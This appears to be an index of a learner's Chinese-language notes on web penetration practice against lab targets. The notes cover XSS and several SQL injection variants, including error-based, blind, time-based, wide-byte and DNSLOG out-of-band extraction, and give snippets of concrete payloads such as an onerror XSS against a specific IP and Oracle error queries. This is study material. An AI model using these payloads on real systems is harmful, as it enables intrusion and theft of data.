kun domxss笔记
domxss取决于输出位置,并不取决于输出环境,因此domxss既有可能是反射型的,也有可能是存储型的,简单去理解就是因为他输出点在DOM,domxss是通过url传入参数去控制触发的可能触发DOM型XSS的属性:document.referer属性window.name属性location属性innerHTML属性documen.write属性来到靶场见框就插,但是并没有什么效果通过url传参1
kun 存储型xss笔记
存储型xss:经过后端,经过数据库靶场的xss利用的是错误日志存储型XSS漏洞117.41.229.122:8082/index.php?c=mail&m=test1234<img src=a onerror=alert(1)>404 然后弹窗说明能利用这个漏洞然后加入xss攻击语句117.41.229.122:8082/index.php?c=mail&m=test1
kun 反射型xss笔记
反射型xss来到靶场逢框就插,<script>alert'123'</script>,但是并没有弹框,F12寻找输出点发现<>被实体化编码了然后选择<input name="keyword" value="<script>alert" script&gt;'="&
kun Oracle报错注入笔记
Oracle报错注入?id=1'--没有报错?id=1' and 1 =ctxsys.drithsx.sn(1,(select banner from sys.v_$version where rownum=1))--报错语句里显示出Oracle数据库版本?id=1' and 1 =ctxsys.drithsx.sn(1,(select table_name from us
kun mssql反弹注入笔记
mssql反弹注入是在明确是注入点无法注入,无错误提示信息,注入工具猜解速度慢、反弹注入用到的函数opendatasource语法OPENDATASOURCE(provider_name,init_string)provider_name 注册为用于访问数据源的OLE DB 提供程序的PROGID的名称 MSSQL的名称为SQLOLEDBin
kun DNSLOG笔记
在MySQL中有个load_file()函数可以用来读取本地的文件,load_file()函数还可以用来发送dns解析请求concat()函数拼接了4个\了,因为转义的原因,\\\\就变成了\\,目的就是利用UNC路径。UNC是一种命名惯例, 主要用于在Microsoft Windows上指定和映射网络驱动器. UNC命名惯例最多被应用于在局域网中访问文件服务器或者打印机。在Widnows中用共享
kun Access偏移注入笔记
access偏移注入是解决一些注入出不来列名或者时的情况,同时要求支持union select ,列名也必须足够多,知道表名document.cookie="id="+escape("105 order by 26"); document.cookie="id="+escape("105 union select 1,
kun 宽字节注入笔记
宽字节对转义字符的影响发生在character_set_client=gbk的情况,也就是说,如果客户端发送的数据字符集是gbk,则可能会吃掉转义字符\,从而导致转义失败%df\'对应的编码就是%df%5c’,即汉字“運’”,这样单引号之前的转义符号“\”就被吃掉?id=1%df'%20order%20by%203--+ 查出3个字段?id=1%df'%20and%201=
kun 时间注入笔记
时间注入需要的主要函数就是sleep(n),让它睡觉几秒钟If(expr1,expr2,expr3)如果expr1语句为true,执行expr2,否则执行expr3rank1?id=1'%20and%201=1--+ 回显?id=1'%20and%201=2--+ 不回显存在注入点?id=1'%20order%20by%203--+回显?id=1'%20order%
kun 盲注笔记
盲注需要用到的几个函数Length()返回字符串的长度Substr()截取字符串Ascii()返回字符的ASCII编码Sleep(n)将程序挂起一段时间,n为秒数If(expr1,expr2,expr3)如果expr1语句为true,执行expr2,否则执行expr3RANK1?id=1'%20and%201=1--+ 回显?id=1'%20and%201=2--+ 不回显存在注入